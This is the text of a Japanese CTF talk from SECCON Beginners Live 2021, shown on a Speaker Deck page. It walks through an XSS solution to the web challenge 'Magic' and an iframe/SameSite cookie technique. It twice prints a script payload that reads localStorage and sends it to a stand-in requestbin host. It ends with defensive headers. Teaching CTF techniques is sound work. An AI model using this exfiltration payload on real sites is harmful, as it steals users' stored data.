Upgrade to Pro
— share decks privately, control downloads, hide ads and more …
Speaker Deck
Features
Speaker Deck
PRO
Sign in
Sign up for free
Search
Search
Magicで学ぶWebセキュリティ - SECCON Beginners Live 2021
Search
Hi120ki
October 17, 2021
Technology
0
1k
Magicで学ぶWebセキュリティ - SECCON Beginners Live 2021
SECCON Beginners Live 2021 発表スライド
https://connpass.com/event/225707/
Hi120ki
October 17, 2021
Tweet
Share
More Decks by Hi120ki
See All by Hi120ki
SECCON13 - SECCON Beginners Workshop - Reversing
hi120ki
0
100
Reversing基礎編 / Basics of Reversing - SECCON Beginners Live 2022
hi120ki
5
2k
CTF大会開催はいいぞ。- 魔女のお茶会 2021冬 / Guide for holding CTF events
hi120ki
2
1.4k
Other Decks in Technology
See All in Technology
解析の定理証明実践@Lean 4
dec9ue
0
100
AIエージェントの継続的改善のためオブザーバビリティ
pharma_x_tech
6
1.4k
キャディでのApache Iceberg, Trino採用事例 -Apache Iceberg and Trino Usecase in CADDi--
caddi_eng
0
170
菸酒生在 LINE Taiwan 的後端雙刀流
line_developers_tw
PRO
0
1.1k
AI技術トレンド勉強会 #1 MCPの基礎と実務での応用
nisei_k
1
250
ひとり情シスなCTOがLLMと始めるオペレーション最適化 / CTO's LLM-Powered Ops
yamitzky
0
380
Claude Code Actionを使ったコード品質改善の取り組み
potix2
PRO
4
1.7k
(非公式) AWS Summit Japan と 海浜幕張 の歩き方 2025年版
coosuke
PRO
1
340
本部長の代わりに提案書レビュー! KDDI営業が毎日使うAIエージェント「A-BOSS」開発秘話
minorun365
PRO
14
2.3k
2025/6/21 日本学術会議公開シンポジウム発表資料
keisuke198619
2
480
[TechNight #90-1] 本当に使える? ZDMの 新機能を実践検証してみた
oracle4engineer
PRO
3
140
25分で解説する「最小権限の原則」を実現するための AWS「ポリシー」大全 / 20250625-aws-summit-aws-policy
opelab
7
770
Featured
See All Featured
Designing for Performance
lara
609
69k
Making the Leap to Tech Lead
cromwellryan
134
9.3k
BBQ
matthewcrist
89
9.7k
How To Stay Up To Date on Web Technology
chriscoyier
790
250k
Optimising Largest Contentful Paint
csswizardry
37
3.3k
Refactoring Trust on Your Teams (GOTO; Chicago 2020)
rmw
34
3k
Facilitating Awesome Meetings
lara
54
6.4k
VelocityConf: Rendering Performance Case Studies
addyosmani
330
24k
A better future with KSS
kneath
239
17k
The Psychology of Web Performance [Beyond Tellerrand 2023]
tammyeverts
48
2.8k
The MySQL Ecosystem @ GitHub 2015
samlambert
251
13k
Speed Design
sergeychernyshev
31
1k
Transcript
Magic Web SECCON Beginners Live 2021 hi120ki
@hi120ki CTF Wani Hackase Web Reversing 2 2021 Reversing :
firmware Web : json, magic
Web Magic 3
Magic [Web Hard] : 31solve Web 5 • • 4
5 /
6 /
7 / URL https://magic.quals.beginners.seccon.jp/magic?token=c4c89cc8-9b78-417b...
8 / URL
9 /
10 crawler/index.js puppeteer Node.js Chrome URL
11 2. FLAG 3. URL crawler/index.js 1.
12 FLAG nginx/html/static/index.js FLAG
13 FLAG JavaScript XSS( )
XSS 14 HTML Web HTML JavaScript Cookie Web
15 https://magic.quals.beginners.seccon.jp/ FLAG FLAG
16 https://magic.quals.beginners.seccon.jp/?????????? FLAG FLAG <script>…</script>
17 FLAG <script>…</script> FLAG https://magic.quals.beginners.seccon.jp/??????????
18 <script> fetch("https://requestbin.example.com/?f=" +encodeURI(localStorage.getItem("memo"))); </script> FLAG XSS URL
XSS 19 magic/views/index.ejs <script> </script>
20 alert(1)
21 FLAG URL <script> fetch("https://requestbin.example.com/?f=" +encodeURI(localStorage.getItem("memo"))); </script>
22 FLAG URL
23 XSS https://magic.quals.beginners.seccon.jp/
24 <script>…</script> https://magic.quals.beginners.seccon.jp/ https://magic.quals.beginners.seccon.jp/ ✕ XSS
25 ... + = ? XSS
26 <script>…</script> https://magic.quals.beginners.seccon.jp/ https://magic.quals.beginners.seccon.jp/ URL <script>…</script> FLAG
27 / URL https://magic.quals.beginners.seccon.jp/magic?token=c4c89cc8-9b78-417b...
28 URL
29 <script>…</script> https://magic.quals.beginners.seccon.jp/ https://magic.quals.beginners.seccon.jp/ <script>…</script> FLAG XSS
30 FLAG 1. FLAG 2. 3.
31
1. XSS 2. 3. 32
1. XSS 2. 3. 33 FLAG
1. XSS 2. 3. 34
1. XSS 2. 3. 35
36 FLAG
XSS • • Byte Bandits CTF 2020 Notes App •
https://github.com/ByteBandits/bbctf-2020 37
Byte Bandits CTF 2020 Notes App 38 https://example.com/login?username= &password= •
FLAG iframe • • API
iframe 39 https://attacker.example.com/ iframe1 iframe2 URL iframe https://example.com/ https://example.com/ URL
iframe
iframe 40 https://attacker.example.com/ iframe1 iframe2 https://example.com/ https://example.com/ iframe 2 iframe
iframe 41 https://attacker.example.com/ iframe1 iframe2 https://example.com/ https://example.com/ FLAG <script>...</script> XSS
FLAG
iframe 42 https://attacker.example.com/ iframe1 iframe2 https://example.com/ https://example.com/ FLAG FLAG (top.iframe1.document.body.innerHTML)
<script>...</script>
43 iframe SameSite Cookie None Lax
44 https://attacker.example.com/ iframe1 https://example.com/ SameSite Cookie=None iframe Cookie Cookie (session=nj49gn...)
FLAG
45 https://attacker.example.com/ iframe1 https://example.com/ SameSite Cookie=Lax iframe Cookie Cookie (session=nj49gn...)
FLAG
SameSite Cookie=Lax 46 https://attacker.example.com/ iframe1 iframe2 https://example.com/ https://example.com/ Cookie Cookie
(session=nj49gn...) ✕ FLAG <script>...</script>
47 SameSite Cookie=None iframe CTF
48 Cookie : SameSite, HttpOnly, Secure... Content-Security-Policy X-Frame-Options ... (
XSS Content-Security-Policy )
49 FLAG +
50 Magic https://github.com/SECCON/Beginners_CTF_2021/tree/main/web/magic/files Freepik from Flaticon https://www.flaticon.com/free-icon/hacker_924874 https://www.flaticon.com/free-icon/programmer_560216 https://www.flaticon.com/free-icon/flag_473724 writeup
https://hi120ki.github.io/blog/posts/20210523-3/
hi120ki
dec9ue
.png){kind=icon}
pharma_x_tech
caddi_eng
line_developers_tw
nisei_k
yamitzky
potix2
coosuke
minorun365
keisuke198619
oracle4engineer
opelab
lara
cromwellryan
matthewcrist
chriscoyier
csswizardry
rmw
addyosmani
kneath
tammyeverts
samlambert
sergeychernyshev
![Magic [Web Hard] : 31solve Web 5 • • 4](https://files.speakerdeck.com/presentations/77735c51e4634f0ca2183b68d2995f18/slide_3.jpg){kind=link}
